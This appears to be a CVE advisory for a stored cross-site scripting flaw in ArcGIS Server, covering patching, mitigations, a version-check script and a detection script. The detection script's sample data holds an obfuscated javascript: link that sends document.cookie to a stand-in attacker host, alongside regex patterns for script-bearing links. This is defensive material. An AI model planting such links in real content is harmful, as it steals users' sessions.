CVE-2024-51948

4.8 MEDIUM

📋 TL;DR

A stored cross-site scripting vulnerability in ArcGIS Server versions 11.3 and below lets a remote, authenticated attacker holding publisher privileges plant a crafted link in server-hosted content. When another user clicks that link, attacker-controlled JavaScript runs in the victim's browser in the context of the ArcGIS Server site. The privileges required are high, which is why the score is only 4.8, but every organization running an unpatched ArcGIS Server deployment with more than one publisher account is exposed.

💻 Affected Systems

Products:
  • ArcGIS Server
Versions: 11.3 and below
Operating Systems: Windows, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Requires publisher-level authentication; not exploitable by anonymous users.

📦 What is this software?

ArcGIS Server is Esri's GIS server product. It publishes map, feature, geoprocessing and related web services through a REST endpoint (the Services Directory), and is administered through the ArcGIS Server Manager web application and the Administrator Directory REST API. Accounts in the built-in publisher role can publish and edit services and the text attached to them; accounts in the administrator role manage the site itself.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An authenticated malicious publisher could steal session cookies, perform actions as authenticated users, or redirect to phishing sites by exploiting stored XSS payloads.

🟠

Likely Case

Limited impact due to high privilege requirements; most likely used for session hijacking or credential theft against users who click crafted links.

🟢

If Mitigated

With the patch applied, publisher accounts limited to trusted staff, and a Content Security Policy that blocks javascript: navigation, impact is minimal: only a trusted publisher could plant the link, and a victim still has to click it.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated publisher access and user interaction (clicking malicious link).

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: ArcGIS Server Security 2025 Update 1 Patch (applied on top of the existing installation; the product version number does not change)

Vendor Advisory: https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-1-patch/

Restart Required: Yes

Instructions:

1. Download the Security 2025 Update 1 patch for your ArcGIS Server version and platform from Esri's patches and updates page.
2. Stop ArcGIS Server services on every machine in the site.
3. Apply the patch according to Esri's installation instructions for that platform.
4. Restart ArcGIS Server services.
5. Verify that the patch appears in the list of installed patches (see How to Verify below); the version number alone does not show it.

🔧 Temporary Workarounds

Restrict Publisher Access

Applies to: all

Limit the publisher role to trusted users only, review who currently holds it, and remove stale or shared publisher accounts. Because the attacker must be a publisher, this is the single most effective workaround.

Input Validation Enhancement

Applies to: all

ArcGIS Server's own input handling cannot be changed by the operator, so validate around it: review free-text fields that publishers can edit (service item information such as descriptions and summaries) for javascript:, vbscript: or data: links and for markup, and consider filtering such strings at the reverse proxy or Web Adaptor that fronts the server.

🧯 If You Can't Patch

  • Set a Content Security Policy on whatever fronts ArcGIS Server (the ArcGIS Web Adaptor or a reverse proxy). Browsers only refuse javascript: navigation when script-src omits 'unsafe-inline', so a policy that allows inline script does nothing against this bug; start with Content-Security-Policy-Report-Only to find what the Manager and Services Directory pages need before enforcing.
  • Monitor and audit publisher account activity, in particular edits to service item information, and scan that content for script-bearing links (see Detection & Monitoring).

🔍 How to Verify

Check if Vulnerable:

A site is vulnerable if it reports ArcGIS Server version 11.3 or below and the Security 2025 Update 1 patch has not been installed. Both conditions must be checked, because the patch leaves the version number unchanged.

Check Version:

The public endpoint https://<server>:6443/arcgis/rest/info?f=json returns the version without authentication, as currentVersion (a number, e.g. 11.3) and fullVersion (a string, e.g. 11.3.0). ArcGIS Server Manager and the Administrator Directory show the same value to authenticated users.

Verify Fix Applied:

Confirm that "ArcGIS Server Security 2025 Update 1 Patch" is listed among the installed patches: on Windows under Programs and Features > View installed updates, on either platform with Esri's Patch Notification utility that ships with ArcGIS Server, or in the Administrator Directory. A version check alone cannot confirm the fix.
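A version check against the public rest/info endpoint, added here as an example (not Esri's tooling). The endpoint path and the currentVersion/fullVersion fields are ArcGIS Server's public REST API; the sample response is constructed for offline use, and the host name is a placeholder. It deliberately reports "in affected range" rather than "vulnerable", because the patch state is not visible from the version number:

```python
"""Check whether an ArcGIS Server site reports a version in the range
affected by CVE-2024-51948 (11.3 and below).

Added example, not Esri code. /arcgis/rest/info?f=json is ArcGIS Server's
public, unauthenticated version endpoint; it returns "currentVersion"
(a number such as 11.3 or 10.91) and "fullVersion" (a string such as
"11.3.0" or "10.9.1"). SAMPLE_INFO below is a constructed response.
"""
import json
import sys
import urllib.request

AFFECTED_MAX = (11, 3)   # every release up to and including 11.3 is affected

# Constructed sample of what rest/info returns; not captured from a real site.
SAMPLE_INFO = json.dumps({
    "currentVersion": 11.3,
    "fullVersion": "11.3.0",
    "soapUrl": "https://gis.example.invalid/arcgis/services",
})


def parse_version(info_json: str) -> tuple:
    """Return (major, minor) from a rest/info document.

    fullVersion is preferred because currentVersion encodes 10.9.1 as the
    float 10.91, which does not split into components reliably.
    """
    info = json.loads(info_json)
    raw = str(info.get("fullVersion") or info.get("currentVersion") or "")
    parts = [int(p) for p in raw.split(".")[:2] if p.isdigit()]
    if len(parts) != 2:
        raise ValueError(f"unrecognised version value: {raw!r}")
    return tuple(parts)


def is_affected(version: tuple) -> bool:
    """True when the version is 11.3 or lower (patch state is not visible here)."""
    return version <= AFFECTED_MAX


def fetch_info(base_url: str, timeout: float = 10.0) -> str:
    """GET <base_url>/rest/info?f=json, e.g. base_url='https://gis.example.invalid:6443/arcgis'.

    urllib verifies TLS; a site with a self-signed certificate needs a
    trusted CA bundle (SSL_CERT_FILE) rather than disabled verification.
    """
    url = base_url.rstrip("/") + "/rest/info?f=json"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


def report(info_json: str) -> str:
    """One-line verdict for a rest/info document."""
    version = parse_version(info_json)
    label = "%d.%d" % version
    if is_affected(version):
        return (f"version {label}: in affected range; confirm that "
                "'ArcGIS Server Security 2025 Update 1 Patch' is installed")
    return f"version {label}: outside affected range"


if __name__ == "__main__":
    # Pass the site's base URL to query a live server; with no argument the
    # constructed sample is used so the script runs offline.
    doc = fetch_info(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_INFO
    print(report(doc))
```

Run it as `python check_version.py https://gis.example.invalid:6443/arcgis` against a live site. Treat "in affected range" as a prompt to check the installed-patches list, not as proof of exposure.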

📡 Detection & Monitoring

Log Indicators:

  • Publisher accounts editing service item information or publishing outside their normal pattern (new accounts, off-hours activity, many edits in a short window)
  • Logged request parameters or message text containing javascript:, vbscript:, data:text/html, <script or on*= event handlers, including HTML-entity or percent-encoded variants

Network Indicators:

  • Script-bearing links (javascript:, data:text/html, <script) inside fields of ArcGIS Server responses that should be plain text, such as service item information and Services Directory HTML

SIEM Query:

Search ArcGIS Server logs, and the access logs of the Web Adaptor or reverse proxy in front of it, for the strings above in request bodies and logged text, after decoding HTML entities and URL encoding; group matches by the user attribute of the log message to attribute them to a publisher account.
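A hunting script for the indicators listed above, added here as an example (not Esri's tooling or a ready-made SIEM query). It normalises entity and percent encoding before matching, then scans two constructed inputs: a service item-information JSON document of the shape the Administrator Directory serves at /arcgis/admin/services/<folder>/<service>.<type>/iteminfo?f=json, and log messages in the <Msg ...>...</Msg> form used in ArcGIS Server's log files. Field values, user names, hosts and log codes in the samples are invented:

```python
"""Hunt for script-bearing links planted by a publisher (CVE-2024-51948).

Added example, not Esri code. It scans two constructed inputs: a service
item-information document of the kind the Administrator Directory serves at
/arcgis/admin/services/<folder>/<service>.<type>/iteminfo?f=json, and ArcGIS
Server log messages in the <Msg ...>...</Msg> form used in the server's log
files. Field values, user names, hosts and log codes below are invented.
"""
import html
import json
import re
from urllib.parse import unquote

# Link payloads that execute script when clicked or rendered. Free-text fields
# such as a service description should never legitimately contain these.
SCRIPT_LINK = re.compile(
    r"(?:javascript|vbscript)\s*:"                  # script URL schemes
    r"|data\s*:\s*text/html"                        # data: URL carrying an HTML document
    r"|<\s*script\b"                                # inline script element
    r"|\bon(?:click|load|error|mouseover|mouseenter|focus|pointerover|toggle)\s*=",
    re.IGNORECASE,
)


def find_script_links(text: str) -> list:
    """Return the suspicious fragments in text after undoing common obfuscation."""
    norm = unquote(html.unescape(text))            # &#106;avascript: and %6A... forms
    norm = re.sub(r"[\t\r\n\x00]", "", norm)       # browsers ignore these inside a scheme
    return [m.group(0) for m in SCRIPT_LINK.finditer(norm)]


def scan_json(doc, path: str = "") -> list:
    """Return [(json_path, fragment)] for every suspicious string in a JSON document."""
    hits = []
    if isinstance(doc, dict):
        for key, value in doc.items():
            hits.extend(scan_json(value, f"{path}.{key}" if path else key))
    elif isinstance(doc, list):
        for i, value in enumerate(doc):
            hits.extend(scan_json(value, f"{path}[{i}]"))
    elif isinstance(doc, str):
        hits.extend((path, frag) for frag in find_script_links(doc))
    return hits


LOG_MSG = re.compile(r"<Msg\b([^>]*)>(.*?)</Msg>", re.S)
ATTR = re.compile(r'(\w+)="([^"]*)"')


def scan_log(log_text: str) -> list:
    """Return [(user, time, fragment)] for log messages whose body carries a script link."""
    hits = []
    for m in LOG_MSG.finditer(log_text):
        attrs = dict(ATTR.findall(m.group(1)))
        for frag in find_script_links(m.group(2)):
            hits.append((attrs.get("user", ""), attrs.get("time", ""), frag))
    return hits


# Constructed item-info document; the entity-encoded scheme is the kind of
# obfuscation a plain substring search for "javascript:" would miss.
SAMPLE_ITEMINFO = json.dumps({
    "title": "Parcels",
    "summary": "County parcels, updated nightly.",
    "description": 'Parcel fabric. <a href="java&#115;cript:fetch('
                   "'https://attacker.invalid/?c='+document.cookie)\">Download</a>",
    "tags": ["parcels", "cadastre"],
    "accessInformation": "County GIS",
})

# Constructed log excerpt in ArcGIS Server's <Msg> format; codes and text are invented.
SAMPLE_LOG = """\
<Msg time="2025-03-04T09:12:44,101" type="INFO" code="100000" source="Rest" process="4120" thread="1" methodName="" machine="GISHOST" user="" elapsed="">Request: https://gis.example.invalid/arcgis/rest/services/Land/Parcels/MapServer?f=html</Msg>
<Msg time="2025-03-04T09:13:02,557" type="WARNING" code="100001" source="Admin" process="4120" thread="7" methodName="" machine="GISHOST" user="publisher1" elapsed="">Edited item info for Land/Parcels.MapServer: description=&lt;a href=&quot;javascript:alert(document.domain)&quot;&gt;help&lt;/a&gt;</Msg>
"""

if __name__ == "__main__":
    for path, frag in scan_json(json.loads(SAMPLE_ITEMINFO)):
        print(f"iteminfo field {path!r}: {frag}")
    for user, when, frag in scan_log(SAMPLE_LOG):
        print(f"log {when} user={user or '<anonymous>'}: {frag}")
```

To run this against a live site, feed scan_json the iteminfo document of each service (fetched with an administrator token) and scan_log the contents of the server's .log files; the user attribute on a matching message is the publisher account to investigate. The event-handler list is deliberately short to keep false positives down in prose fields; extend it if your content never contains the word "on" followed by an equals sign.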
